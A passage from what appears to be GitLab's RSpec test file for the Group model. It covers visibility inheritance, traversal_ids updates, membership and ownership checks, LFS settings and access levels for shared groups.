it 'returns parent group notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
create(:notification_setting, user: user, source: subgroup, notification_email: '')
is_expected.to eq(group_notification_email)
end
end
context 'when only the parent group notification email is set' do
it 'returns parent group notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
is_expected.to eq(group_notification_email)
end
end
end
describe '#visibility_level_allowed_by_parent' do
let(:parent) { create(:group, :internal) }
let(:sub_group) { build(:group, parent_id: parent.id) }
context 'without a parent' do
it 'is valid' do
sub_group.parent_id = nil
expect(sub_group).to be_valid
end
end
context 'with a parent' do
context 'when visibility of sub group is greater than the parent' do
it 'is invalid' do
sub_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(sub_group).to be_invalid
end
end
context 'when visibility of sub group is lower or equal to the parent' do
[Gitlab::VisibilityLevel::INTERNAL, Gitlab::VisibilityLevel::PRIVATE].each do |level|
it 'is valid' do
sub_group.visibility_level = level
expect(sub_group).to be_valid
end
end
end
end
end
describe '#visibility_level_allowed_by_projects' do
let!(:internal_group) { create(:group, :internal) }
let!(:internal_project) { create(:project, :internal, group: internal_group) }
context 'when group has a lower visibility' do
it 'is invalid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PRIVATE
expect(internal_group).to be_invalid
expect(internal_group.errors[:visibility_level]).to include('private is not allowed since this group contains projects with higher visibility.')
end
end
context 'when group has a higher visibility' do
it 'is valid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(internal_group).to be_valid
end
end
end
describe '#visibility_level_allowed_by_sub_groups' do
let!(:internal_group) { create(:group, :internal) }
let!(:internal_sub_group) { create(:group, :internal, parent: internal_group) }
context 'when parent group has a lower visibility' do
it 'is invalid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PRIVATE
expect(internal_group).to be_invalid
expect(internal_group.errors[:visibility_level]).to include('private is not allowed since there are sub-groups with higher visibility.')
end
end
context 'when parent group has a higher visibility' do
it 'is valid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(internal_group).to be_valid
end
end
end
describe '#two_factor_authentication_allowed' do
let_it_be_with_reload(:group) { create(:group) }
context 'for a parent group' do
it 'is valid' do
group.require_two_factor_authentication = true
expect(group).to be_valid
end
end
context 'for a child group' do
let(:sub_group) { create(:group, parent: group) }
it 'is valid when parent group allows' do
sub_group.require_two_factor_authentication = true
expect(sub_group).to be_valid
end
it 'is invalid when parent group blocks' do
group.namespace_settings.update!(allow_mfa_for_subgroups: false)
sub_group.require_two_factor_authentication = true
expect(sub_group).to be_invalid
expect(sub_group.errors[:require_two_factor_authentication]).to include('is forbidden by a top-level group')
end
end
end
end
context 'traversal_ids on create' do
context 'default traversal_ids' do
let(:group) { build(:group) }
before do
group.save!
group.reload
end
it { expect(group.traversal_ids).to eq [group.id] }
end
context 'has a parent' do
let(:parent) { create(:group) }
let(:group) { build(:group, parent: parent) }
before do
group.save!
reload_models(parent, group)
end
it { expect(parent.traversal_ids).to eq [parent.id] }
it { expect(group.traversal_ids).to eq [parent.id, group.id] }
end
context 'has a parent update before save' do
let(:parent) { create(:group) }
let(:group) { build(:group, parent: parent) }
let!(:new_grandparent) { create(:group) }
before do
parent.update!(parent: new_grandparent)
group.save!
reload_models(parent, group)
end
it 'avoid traversal_ids race condition' do
expect(parent.traversal_ids).to eq [new_grandparent.id, parent.id]
expect(group.traversal_ids).to eq [new_grandparent.id, parent.id, group.id]
end
end
end
context 'traversal_ids on update' do
context 'parent is updated' do
let(:new_parent) { create(:group) }
subject {group.update!(parent: new_parent, name: 'new name') }
it_behaves_like 'update on column', :traversal_ids
end
context 'parent is not updated' do
subject { group.update!(name: 'new name') }
it_behaves_like 'no update on column', :traversal_ids
end
end
context 'traversal_ids on ancestral update' do
context 'update multiple ancestors before save' do
let(:parent) { create(:group) }
let(:group) { create(:group, parent: parent) }
let!(:new_grandparent) { create(:group) }
let!(:new_parent) { create(:group) }
before do
group.parent = new_parent
new_parent.update!(parent: new_grandparent)
group.save!
reload_models(parent, group, new_grandparent, new_parent)
end
it 'avoids traversal_ids race condition' do
expect(parent.traversal_ids).to eq [parent.id]
expect(group.traversal_ids).to eq [new_grandparent.id, new_parent.id, group.id]
expect(new_grandparent.traversal_ids).to eq [new_grandparent.id]
expect(new_parent.traversal_ids).to eq [new_grandparent.id, new_parent.id]
end
end
context 'assign a new parent' do
let!(:group) { create(:group, parent: old_parent) }
let(:recorded_queries) { ActiveRecord::QueryRecorder.new }
subject do
recorded_queries.record do
group.update(parent: new_parent)
end
end
before do
subject
reload_models(old_parent, new_parent, group)
end
context 'within the same hierarchy' do
let!(:root) { create(:group).reload }
let!(:old_parent) { create(:group, parent: root) }
let!(:new_parent) { create(:group, parent: root) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [root.id, new_parent.id, group.id]
end
it_behaves_like 'hierarchy with traversal_ids'
it_behaves_like 'locked row' do
let(:row) { root }
end
end
context 'to another hierarchy' do
let!(:old_parent) { create(:group) }
let!(:new_parent) { create(:group) }
let!(:group) { create(:group, parent: old_parent) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [new_parent.id, group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [old_parent, new_parent] }
end
context 'old hierarchy' do
let(:root) { old_parent.root_ancestor }
it_behaves_like 'hierarchy with traversal_ids'
end
context 'new hierarchy' do
let(:root) { new_parent.root_ancestor }
it_behaves_like 'hierarchy with traversal_ids'
end
end
context 'from being a root ancestor' do
let!(:old_parent) { nil }
let!(:new_parent) { create(:group) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [new_parent.id, group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [group, new_parent] }
end
it_behaves_like 'hierarchy with traversal_ids' do
let(:root) { new_parent }
end
end
context 'to being a root ancestor' do
let!(:old_parent) { create(:group) }
let!(:new_parent) { nil }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [old_parent, group] }
end
it_behaves_like 'hierarchy with traversal_ids' do
let(:root) { group }
end
end
end
context 'assigning a new grandparent' do
let!(:old_grandparent) { create(:group) }
let!(:new_grandparent) { create(:group) }
let!(:parent_group) { create(:group, parent: old_grandparent) }
let!(:group) { create(:group, parent: parent_group) }
before do
parent_group.update(parent: new_grandparent)
end
it 'updates traversal_ids for all descendants' do
expect(parent_group.reload.traversal_ids).to eq [new_grandparent.id, parent_group.id]
expect(group.reload.traversal_ids).to eq [new_grandparent.id, parent_group.id, group.id]
end
end
end
context 'traversal queries' do
let_it_be(:group, reload: true) { create(:group, :nested) }
context 'recursive' do
before do
stub_feature_flags(use_traversal_ids: false)
end
it_behaves_like 'namespace traversal'
describe '#self_and_descendants' do
it { expect(group.self_and_descendants.to_sql).not_to include 'traversal_ids @>' }
end
describe '#self_and_descendant_ids' do
it { expect(group.self_and_descendant_ids.to_sql).not_to include 'traversal_ids @>' }
end
describe '#descendants' do
it { expect(group.descendants.to_sql).not_to include 'traversal_ids @>' }
end
describe '#ancestors' do
it { expect(group.ancestors.to_sql).not_to include 'traversal_ids <@' }
end
end
context 'linear' do
it_behaves_like 'namespace traversal'
describe '#self_and_descendants' do
it { expect(group.self_and_descendants.to_sql).to include 'traversal_ids @>' }
end
describe '#self_and_descendant_ids' do
it { expect(group.self_and_descendant_ids.to_sql).to include 'traversal_ids @>' }
end
describe '#descendants' do
it { expect(group.descendants.to_sql).to include 'traversal_ids @>' }
end
describe '#ancestors' do
it { expect(group.ancestors.to_sql).to include "\"namespaces\".\"id\" = #{group.parent_id}" }
it 'hierarchy order' do
expect(group.ancestors(hierarchy_order: :asc).to_sql).to include 'ORDER BY "depth" ASC'
end
context 'ancestor linear queries feature flag disabled' do
before do
stub_feature_flags(use_traversal_ids_for_ancestors: false)
end
it { expect(group.ancestors.to_sql).not_to include 'traversal_ids <@' }
end
end
end
end
describe '.without_integration' do
let(:another_group) { create(:group) }
let(:instance_integration) { build(:jira_integration, :instance) }
before do
create(:jira_integration, group: group, project: nil)
create(:integrations_slack, group: another_group, project: nil)
end
it 'returns groups without integration' do
expect(Group.without_integration(instance_integration)).to contain_exactly(another_group)
end
end
describe '.public_or_visible_to_user' do
let!(:private_group) { create(:group, :private) }
let!(:internal_group) { create(:group, :internal) }
subject { described_class.public_or_visible_to_user(user) }
context 'when user is nil' do
let!(:user) { nil }
it { is_expected.to match_array([group]) }
end
context 'when user' do
let!(:user) { create(:user) }
context 'when user does not have access to any private group' do
it { is_expected.to match_array([internal_group, group]) }
end
context 'when user is a member of private group' do
before do
private_group.add_user(user, Gitlab::Access::DEVELOPER)
end
it { is_expected.to match_array([private_group, internal_group, group]) }
end
context 'when user is a member of private subgroup' do
let!(:private_subgroup) { create(:group, :private, parent: private_group) }
before do
private_subgroup.add_user(user, Gitlab::Access::DEVELOPER)
end
it { is_expected.to match_array([private_subgroup, internal_group, group]) }
end
end
end
describe 'scopes' do
let_it_be(:private_group) { create(:group, :private) }
let_it_be(:internal_group) { create(:group, :internal) }
let_it_be(:user1) { create(:user) }
let_it_be(:user2) { create(:user) }
describe 'public_only' do
subject { described_class.public_only.to_a }
it { is_expected.to eq([group]) }
end
describe 'public_and_internal_only' do
subject { described_class.public_and_internal_only.to_a }
it { is_expected.to match_array([group, internal_group]) }
end
describe 'non_public_only' do
subject { described_class.non_public_only.to_a }
it { is_expected.to match_array([private_group, internal_group]) }
end
describe 'private_only' do
subject { described_class.private_only.to_a }
it { is_expected.to match_array([private_group]) }
end
describe 'with_onboarding_progress' do
subject { described_class.with_onboarding_progress }
it 'joins onboarding_progress' do
create(:onboarding_progress, namespace: group)
expect(subject).to eq([group])
end
end
describe 'for_authorized_group_members' do
let_it_be(:group_member1) { create(:group_member, source: private_group, user_id: user1.id, access_level: Gitlab::Access::OWNER) }
it do
result = described_class.for_authorized_group_members([user1.id, user2.id])
expect(result).to match_array([private_group])
end
end
describe 'for_authorized_project_members' do
let_it_be(:project) { create(:project, group: internal_group) }
let_it_be(:project_member1) { create(:project_member, source: project, user_id: user1.id, access_level: Gitlab::Access::DEVELOPER) }
it do
result = described_class.for_authorized_project_members([user1.id, user2.id])
expect(result).to match_array([internal_group])
end
end
end
describe '#to_reference' do
it 'returns a String reference to the object' do
expect(group.to_reference).to eq "@#{group.name}"
end
end
describe '#users' do
it { expect(group.users).to eq(group.owners) }
end
describe '#human_name' do
it { expect(group.human_name).to eq(group.name) }
end
describe '#add_user' do
let(:user) { create(:user) }
before do
group.add_user(user, GroupMember::MAINTAINER)
end
it { expect(group.group_members.maintainers.map(&:user)).to include(user) }
end
describe '#add_users' do
let(:user) { create(:user) }
before do
group.add_users([user.id], GroupMember::GUEST)
end
it "updates the group permission" do
expect(group.group_members.guests.map(&:user)).to include(user)
group.add_users([user.id], GroupMember::DEVELOPER)
expect(group.group_members.developers.map(&:user)).to include(user)
expect(group.group_members.guests.map(&:user)).not_to include(user)
end
end
describe '#avatar_type' do
let(:user) { create(:user) }
before do
group.add_user(user, GroupMember::MAINTAINER)
end
it "is true if avatar is image" do
group.update_attribute(:avatar, 'uploads/avatar.png')
expect(group.avatar_type).to be_truthy
end
it "is false if avatar is html page" do
group.update_attribute(:avatar, 'uploads/avatar.html')
group.avatar_type
expect(group.errors.added?(:avatar, "file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff, ico, webp")).to be true
end
end
describe '#avatar_url' do
let!(:group) { create(:group, :with_avatar) }
let(:user) { create(:user) }
context 'when avatar file is uploaded' do
before do
group.add_maintainer(user)
end
it 'shows correct avatar url' do
expect(group.avatar_url).to eq(group.avatar.url)
expect(group.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, group.avatar.url].join)
end
end
end
describe '.search' do
it 'returns groups with a matching name' do
expect(described_class.search(group.name)).to eq([group])
end
it 'returns groups with a partially matching name' do
expect(described_class.search(group.name[0..2])).to eq([group])
end
it 'returns groups with a matching name regardless of the casing' do
expect(described_class.search(group.name.upcase)).to eq([group])
end
it 'returns groups with a matching path' do
expect(described_class.search(group.path)).to eq([group])
end
it 'returns groups with a partially matching path' do
expect(described_class.search(group.path[0..2])).to eq([group])
end
it 'returns groups with a matching path regardless of the casing' do
expect(described_class.search(group.path.upcase)).to eq([group])
end
end
describe '#has_owner?' do
before do
@members = setup_group_members(group)
create(:group_member, :invited, :owner, group: group)
end
it { expect(group.has_owner?(@members[:owner])).to be_truthy }
it { expect(group.has_owner?(@members[:maintainer])).to be_falsey }
it { expect(group.has_owner?(@members[:developer])).to be_falsey }
it { expect(group.has_owner?(@members[:reporter])).to be_falsey }
it { expect(group.has_owner?(@members[:guest])).to be_falsey }
it { expect(group.has_owner?(@members[:requester])).to be_falsey }
it { expect(group.has_owner?(nil)).to be_falsey }
end
describe '#has_maintainer?' do
before do
@members = setup_group_members(group)
create(:group_member, :invited, :maintainer, group: group)
end
it { expect(group.has_maintainer?(@members[:owner])).to be_falsey }
it { expect(group.has_maintainer?(@members[:maintainer])).to be_truthy }
it { expect(group.has_maintainer?(@members[:developer])).to be_falsey }
it { expect(group.has_maintainer?(@members[:reporter])).to be_falsey }
it { expect(group.has_maintainer?(@members[:guest])).to be_falsey }
it { expect(group.has_maintainer?(@members[:requester])).to be_falsey }
it { expect(group.has_maintainer?(nil)).to be_falsey }
end
describe '#last_owner?' do
before do
@members = setup_group_members(group)
end
it { expect(group.last_owner?(@members[:owner])).to be_truthy }
context 'with two owners' do
before do
create(:group_member, :owner, group: group)
end
it { expect(group.last_owner?(@members[:owner])).to be_falsy }
end
context 'with owners from a parent' do
before do
parent_group = create(:group)
create(:group_member, :owner, group: parent_group)
group.update(parent: parent_group)
end
it { expect(group.last_owner?(@members[:owner])).to be_falsy }
end
end
describe '#member_last_blocked_owner?' do
let_it_be(:blocked_user) { create(:user, :blocked) }
let(:member) { blocked_user.group_members.last }
before do
group.add_user(blocked_user, GroupMember::OWNER)
end
context 'when last_blocked_owner is set' do
before do
expect(group).not_to receive(:members_with_parents)
end
it 'returns true' do
member.last_blocked_owner = true
expect(group.member_last_blocked_owner?(member)).to be(true)
end
it 'returns false' do
member.last_blocked_owner = false
expect(group.member_last_blocked_owner?(member)).to be(false)
end
end
context 'when last_blocked_owner is not set' do
it { expect(group.member_last_blocked_owner?(member)).to be(true) }
context 'with another active owner' do
before do
group.add_user(create(:user), GroupMember::OWNER)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
context 'with 2 blocked owners' do
before do
group.add_user(create(:user, :blocked), GroupMember::OWNER)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
context 'with owners from a parent' do
before do
parent_group = create(:group)
create(:group_member, :owner, group: parent_group)
group.update(parent: parent_group)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
end
end
context 'when analyzing blocked owners' do
let_it_be(:blocked_user) { create(:user, :blocked) }
describe '#single_blocked_owner?' do
context 'when there is only one blocked owner' do
before do
group.add_user(blocked_user, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_blocked_owner?).to eq(true)
end
end
context 'when there are multiple blocked owners' do
let_it_be(:blocked_user_2) { create(:user, :blocked) }
before do
group.add_user(blocked_user, GroupMember::OWNER)
group.add_user(blocked_user_2, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_blocked_owner?).to eq(false)
end
end
context 'when there are no blocked owners' do
it 'returns false' do
expect(group.single_blocked_owner?).to eq(false)
end
end
end
describe '#blocked_owners' do
let_it_be(:user) { create(:user) }
before do
group.add_user(blocked_user, GroupMember::OWNER)
group.add_user(user, GroupMember::OWNER)
end
it 'has only blocked owners' do
expect(group.blocked_owners.map(&:user)).to match([blocked_user])
end
end
end
describe '#single_owner?' do
let_it_be(:user) { create(:user) }
context 'when there is only one owner' do
before do
group.add_user(user, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_owner?).to eq(true)
end
end
context 'when there are multiple owners' do
let_it_be(:user_2) { create(:user) }
before do
group.add_user(user, GroupMember::OWNER)
group.add_user(user_2, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_owner?).to eq(false)
end
end
context 'when there are no owners' do
it 'returns false' do
expect(group.single_owner?).to eq(false)
end
end
end
describe '#member_last_owner?' do
let_it_be(:user) { create(:user) }
let(:member) { group.members.last }
before do
group.add_user(user, GroupMember::OWNER)
end
context 'when last_owner is set' do
before do
expect(group).not_to receive(:last_owner?)
end
it 'returns true' do
member.last_owner = true
expect(group.member_last_owner?(member)).to be(true)
end
it 'returns false' do
member.last_owner = false
expect(group.member_last_owner?(member)).to be(false)
end
end
context 'when last_owner is not set' do
it 'returns true' do
expect(group).to receive(:last_owner?).and_call_original
expect(group.member_last_owner?(member)).to be(true)
end
end
end
describe '#lfs_enabled?' do
context 'LFS enabled globally' do
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
it 'returns true when nothing is set' do
expect(group.lfs_enabled?).to be_truthy
end
it 'returns false when set to false' do
group.update_attribute(:lfs_enabled, false)
expect(group.lfs_enabled?).to be_falsey
end
it 'returns true when set to true' do
group.update_attribute(:lfs_enabled, true)
expect(group.lfs_enabled?).to be_truthy
end
end
context 'LFS disabled globally' do
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
end
it 'returns false when nothing is set' do
expect(group.lfs_enabled?).to be_falsey
end
it 'returns false when set to false' do
group.update_attribute(:lfs_enabled, false)
expect(group.lfs_enabled?).to be_falsey
end
it 'returns false when set to true' do
group.update_attribute(:lfs_enabled, true)
expect(group.lfs_enabled?).to be_falsey
end
end
end
describe '#owners' do
let(:owner) { create(:user) }
let(:developer) { create(:user) }
it 'returns the owners of a Group' do
group.add_owner(owner)
group.add_developer(developer)
expect(group.owners).to eq([owner])
end
end
def setup_group_members(group)
members = {
owner: create(:user),
maintainer: create(:user),
developer: create(:user),
reporter: create(:user),
guest: create(:user),
requester: create(:user)
}
group.add_user(members[:owner], GroupMember::OWNER)
group.add_user(members[:maintainer], GroupMember::MAINTAINER)
group.add_user(members[:developer], GroupMember::DEVELOPER)
group.add_user(members[:reporter], GroupMember::REPORTER)
group.add_user(members[:guest], GroupMember::GUEST)
group.request_access(members[:requester])
members
end
describe '#web_url' do
it 'returns the canonical URL' do
expect(group.web_url).to include("groups/#{group.name}")
end
context 'nested group' do
let(:nested_group) { create(:group, :nested) }
it { expect(nested_group.web_url).to include("groups/#{nested_group.full_path}") }
end
end
describe 'nested group' do
subject { build(:group, :nested) }
it { is_expected.to be_valid }
it { expect(subject.parent).to be_kind_of(described_class) }
end
describe '#max_member_access_for_user' do
let_it_be(:group_user) { create(:user) }
context 'with user in the group' do
before do
group.add_owner(group_user)
end
it 'returns correct access level' do
expect(group.max_member_access_for_user(group_user)).to eq(Gitlab::Access::OWNER)
end
end
context 'when user is nil' do
it 'returns NO_ACCESS' do
expect(group.max_member_access_for_user(nil)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'evaluating admin access level' do
let_it_be(:admin) { create(:admin) }
context 'when admin mode is enabled', :enable_admin_mode do
it 'returns OWNER by default' do
expect(group.max_member_access_for_user(admin)).to eq(Gitlab::Access::OWNER)
end
end
context 'when admin mode is disabled' do
it 'returns NO_ACCESS' do
expect(group.max_member_access_for_user(admin)).to eq(Gitlab::Access::NO_ACCESS)
end
end
it 'returns NO_ACCESS when only concrete membership should be considered' do
expect(group.max_member_access_for_user(admin, only_concrete_membership: true))
.to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'group shared with another group' do
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:child_group_user) { create(:user) }
let_it_be(:group_parent) { create(:group, :private) }
let_it_be(:group) { create(:group, :private, parent: group_parent) }
let_it_be(:group_child) { create(:group, :private, parent: group) }
let_it_be(:shared_group_parent) { create(:group, :private) }
let_it_be(:shared_group) { create(:group, :private, parent: shared_group_parent) }
let_it_be(:shared_group_child) { create(:group, :private, parent: shared_group) }
before do
group_parent.add_owner(parent_group_user)
group.add_owner(group_user)
group_child.add_owner(child_group_user)
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group,
group_access: GroupMember::DEVELOPER })
end
context 'with user in the group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(group_user)).to eq(Gitlab::Access::DEVELOPER)
expect(shared_group_child.max_member_access_for_user(group_user)).to eq(Gitlab::Access::DEVELOPER)
end
context 'with lower group access level than max access level for share' do
let(:user) { create(:user) }
it 'returns correct access level' do
group.add_reporter(user)
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::REPORTER)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::REPORTER)
end
end
end
context 'with user in the parent group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'with user in the child group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'unrelated project owner' do
let(:common_id) { [Project.maximum(:id).to_i, Namespace.maximum(:id).to_i].max + 999 }
let!(:group) { create(:group, id: common_id) }
let!(:unrelated_project) { create(:project, id: common_id) }
let(:user) { unrelated_project.owner }
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'user without accepted access request' do
let!(:user) { create(:user) }
before do
create(:group_member, :developer, :access_request, user: user, group: group)
end
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
end
context 'multiple groups shared with group' do
let(:user) { create(:user) }
let(:group) { create(:group, :private) }
let(:shared_group_parent) { create(:group, :private) }
let(:shared_group) { create(:group, :private, parent: shared_group_parent) }
before do
group.add_owner(user)
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group,
group_access: GroupMember::DEVELOPER })
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group_parent,
group_access: GroupMember::MAINTAINER })
end
it 'returns correct access level' do
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::MAINTAINER)
end
end
end
describe '#direct_members' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let_it_be(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
it 'does not return members of the parent' do
expect(group.direct_members).not_to include(maintainer)
end
it 'returns the direct member of the group' do
expect(group.direct_members).to include(developer)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'does not return members of the shared_with group' do
expect(shared_group.direct_members).not_to(
include(developer))
end
end
end
shared_examples_for 'members_with_parents' do
let!(:group) { create(:group, :nested) }
let!(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let!(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
it 'returns parents members' do
expect(group.members_with_parents).to include(developer)
expect(group.members_with_parents).to include(maintainer)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'returns shared with group members' do
expect(shared_group.members_with_parents).to(
include(developer))
end
end
end
describe '#members_with_parents' do
it_behaves_like 'members_with_parents'
end
describe '#authorizable_members_with_parents' do
let(:group) { create(:group) }
it_behaves_like 'members_with_parents'
context 'members with associated user but also having invite_token' do
let!(:member) { create(:group_member, :developer, :invited, user: create(:user), group: group) }
it 'includes such members in the result' do
expect(group.authorizable_members_with_parents).to include(member)
end
end
context 'invited members' do
let!(:member) { create(:group_member, :developer, :invited, group: group) }
it 'does not include such members in the result' do
expect(group.authorizable_members_with_parents).not_to include(member)
end
end
context 'members from group shares' do
let(:shared_group) { group }
let(:shared_with_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: shared_with_group)
end
context 'an invited member that is part of the shared_with_group' do
let!(:member) { create(:group_member, :developer, :invited, group: shared_with_group) }
it 'does not include such members in the result' do
expect(shared_group.authorizable_members_with_parents).not_to(
include(member))
end
end
end
end
describe '#members_from_self_and_ancestors_with_effective_access_level' do
let!(:group_parent) { create(:group, :private) }
let!(:group) { create(:group, :private, parent: group_parent) }
let!(:group_child) { create(:group, :private, parent: group) }
let!(:user) { create(:user) }
let(:parent_group_access_level) { Gitlab::Access::REPORTER }
let(:group_access_level) { Gitlab::Access::DEVELOPER }
let(:child_group_access_level) { Gitlab::Access::MAINTAINER }
before do
create(:group_member, user: user, group: group_parent, access_level: parent_group_access_level)
create(:group_member, user: user, group: group, access_level: group_access_level)
create(:group_member, :minimal_access, user: create(:user), source: group)
create(:group_member, user: user, group: group_child, access_level: child_group_access_level)
end
it 'returns effective access level for user' do
expect(group_parent.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => parent_group_access_level)
)
)
expect(group.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => group_access_level)
)
)
expect(group_child.members_from_self_and_ancestors_with_effective_access_level.as_json).to(
contain_exactly(
hash_including('user_id' => user.id, 'access_level' => child_group_access_level)
)
)
end
end
context 'members-related methods' do
let!(:group) { create(:group, :nested) }
let!(:sub_group) { create(:group, parent: group) }
let!(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let!(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
let!(:other_developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
describe '#direct_and_indirect_members' do
it 'returns parents members' do
expect(group.direct_and_indirect_members).to include(developer)
expect(group.direct_and_indirect_members).to include(maintainer)
end
it 'returns descendant members' do
expect(group.direct_and_indirect_members).to include(other_developer)
end
end
describe '#direct_and_indirect_members_with_inactive' do
let!(:maintainer_blocked) { group.parent.add_user(create(:user, :blocked), GroupMember::MAINTAINER) }
it 'returns parents members' do
expect(group.direct_and_indirect_members_with_inactive).to include(developer)
expect(group.direct_and_indirect_members_with_inactive).to include(maintainer)
expect(group.direct_and_indirect_members_with_inactive).to include(maintainer_blocked)
end
it 'returns descendant members' do
expect(group.direct_and_indirect_members_with_inactive).to include(other_developer)
end
end
end
describe '#users_with_descendants' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:group) { create(:group) }
let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
it 'returns member users on every nest level without duplication' do
group.add_developer(user_a)
nested_group.add_developer(user_b)
deep_nested_group.add_maintainer(user_a)
expect(group.users_with_descendants).to contain_exactly(user_a, user_b)
expect(nested_group.users_with_descendants).to contain_exactly(user_a, user_b)
expect(deep_nested_group.users_with_descendants).to contain_exactly(user_a)
end
end
context 'user-related methods' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:user_c) { create(:user) }
let(:user_d) { create(:user) }
let(:group) { create(:group) }
let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
let(:project) { create(:project, namespace: group) }
before do
group.add_developer(user_a)
group.add_developer(user_c)
nested_group.add_developer(user_b)
deep_nested_group.add_developer(user_a)
project.add_developer(user_d)
end
describe '#direct_and_indirect_users' do
it 'returns member users on every nest level without duplication' do
expect(group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c, user_d)
expect(nested_group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c)
expect(deep_nested_group.direct_and_indirect_users).to contain_exactly(user_a, user_b, user_c)
end
it 'does not return members of projects belonging to ancestor groups' do
expect(nested_group.direct_and_indirect_users).not_to include(user_d)
end
end
describe '#direct_and_indirect_users_with_inactive' do
let(:user_blocked_1) { create(:user, :blocked) }
let(:user_blocked_2) { create(:user, :blocked) }
let(:user_blocked_3) { create(:user, :blocked) }
let(:project_in_group) { create(:project, namespace: nested_group) }
before do
group.add_developer(user_blocked_1)
nested_group.add_developer(user_blocked_1)
deep_nested_group.add_developer(user_blocked_2)
project_in_group.add_developer(user_blocked_3)
end
it 'returns member users on every nest level without duplication' do
expect(group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_d, user_blocked_1, user_blocked_2, user_blocked_3)
expect(nested_group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_blocked_1, user_blocked_2, user_blocked_3)
expect(deep_nested_group.direct_and_indirect_users_with_inactive).to contain_exactly(user_a, user_b, user_c, user_blocked_1, user_blocked_2)
end
it 'returns members of projects belonging to group' do
expect(nested_group.direct_and_indirect_users_with_inactive).to include(user_blocked_3)
end
end
end
describe '#project_users_with_descendants' do
let(:user_a) { create(:user) }
let(:user_b) { create(:user) }
let(:user_c) { create(:user) }
let(:group) { create(:group) }
